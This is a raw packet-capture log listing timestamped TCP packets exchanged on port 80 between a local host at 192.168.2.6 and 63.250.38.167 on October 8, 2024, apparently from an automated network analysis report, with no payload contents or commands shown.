Oct 8, 2024 11:30:20.311578989 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.311587095 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.311602116 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.311605930 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.311618090 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.311633110 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.311641932 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.311649084 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.311665058 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.311672926 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.311709881 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.312063932 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.312078953 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.312093973 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.312118053 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.312246084 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.312277079 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.312289953 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.312293053 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.312315941 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.312328100 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.312331915 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.312346935 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.312361002 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.312375069 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.312376022 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.312391996 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.312401056 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.312407017 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.312422037 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.312431097 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.312437057 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.312453032 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.312462091 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.312467098 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.312482119 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.312493086 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.312496901 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.312514067 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.312521935 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.312527895 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.312544107 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.312552929 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.312557936 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.312573910 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.312586069 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.312617064 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.313937902 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.313960075 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.313976049 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.313990116 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.313998938 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.314013004 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.314028025 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.314029932 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.314044952 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.314060926 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.314064980 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.314101934 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.314186096 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.314208031 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.314222097 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.314239025 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.314246893 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.314254999 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.314269066 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.314279079 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.314285040 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.314299107 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.314310074 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.314315081 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.314341068 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.314342022 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.314356089 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.314371109 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.314382076 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.314385891 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.314405918 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.314414024 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.314420938 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.314435005 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.314445019 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.314456940 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.314474106 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.314487934 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.314495087 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.314502954 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.314505100 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.314522028 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.314546108 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.314554930 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.314560890 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.314574957 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.314587116 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.314590931 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.314605951 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.314615965 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.314621925 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.314636946 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.314650059 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.314651966 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.314666986 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.314675093 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.314682007 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.314696074 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.314697981 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.314713001 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.314727068 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.314738989 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.314743042 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.314758062 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.314769030 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.314774990 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.314789057 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.314796925 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.314804077 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.314817905 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.314826965 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.314832926 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.314847946 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.314852953 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.314863920 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.314887047 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.314976931 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.314991951 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.315007925 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.315020084 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.315093994 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.315196991 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.315212011 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.315226078 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.315239906 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.315251112 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.315256119 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.315272093 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.315279961 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.315288067 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.315303087 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.315315008 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.315318108 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.315331936 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.315346003 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.315346956 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.315370083 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.315371990 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.315402031 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.315411091 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.315417051 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.315432072 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.315447092 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.315452099 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.315468073 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.315483093 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.315490961 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.315498114 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.315514088 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.315521002 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.315529108 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.315543890 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.315555096 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.315558910 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.315572977 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.315582037 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.315587997 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.315596104 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.315610886 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.315613985 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.315627098 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.315642118 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.315649033 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.315656900 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.315673113 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.315687895 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.315702915 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.315711021 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.315717936 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.315732956 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.315749884 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.315766096 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.315768003 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.315779924 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.315794945 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.315804958 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.315810919 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.315824032 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.315828085 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.315845013 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.315851927 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.315862894 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.315880060 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.315886021 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.315922022 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.316049099 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.316063881 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.316080093 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.316093922 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.316098928 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.316112041 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.316127062 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.316137075 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.316173077 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.316221952 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.316246033 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.316261053 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.316276073 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.316284895 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.316291094 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.316308022 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.316314936 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.316323996 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.316339016 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.316348076 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.316353083 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.316369057 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.316381931 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.316381931 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.316406012 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.316421032 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.316433907 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.316435099 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.316450119 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.316450119 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.316464901 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.316468000 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.316481113 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.316495895 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.316502094 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.316509962 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.316524029 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.316535950 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.316540003 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.316560030 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.316564083 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.316581964 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.316597939 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.316598892 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.316613913 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.316628933 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.316637039 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.316644907 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.316658974 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.316672087 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.316683054 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.316694021 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.316699028 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.316714048 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.316729069 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.316736937 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.316742897 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.316759109 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.316768885 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.316773891 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.316787958 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.316797972 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.316802979 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.316818953 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.316829920 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.316838026 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.316852093 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.316863060 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.316867113 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.316881895 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.316889048 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.316899061 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.316915035 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.316924095 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.316930056 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.316945076 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.316955090 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.316958904 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.316975117 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.316982985 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.316989899 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.317004919 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.317014933 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.317020893 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.317039013 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.317047119 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.317078114 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.317429066 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.317589998 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.317605019 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.317627907 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.317631960 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.317643881 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.317658901 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.317668915 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.317673922 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.317689896 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.317696095 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.317698002 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.317711115 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.317725897 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.317732096 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.317742109 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.317754030 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.317766905 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.317781925 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.317785978 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.317796946 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.317816019 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.317820072 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.317830086 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.317845106 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.317858934 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.317861080 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.317876101 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.317886114 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.317890882 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.317907095 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.317914009 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.317920923 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.317936897 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.317943096 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.317979097 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:24.511218071 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:26.670545101 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:26.675436020 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:26.675517082 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:26.675836086 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:26.680583000 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.276657104 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.276705980 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.276716948 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.276726007 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.277004004 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.277007103 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.277007103 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.277035952 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.277060032 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.277147055 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.277157068 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.277172089 CEST	80	49794	63.250.38.167	192.168.2.6
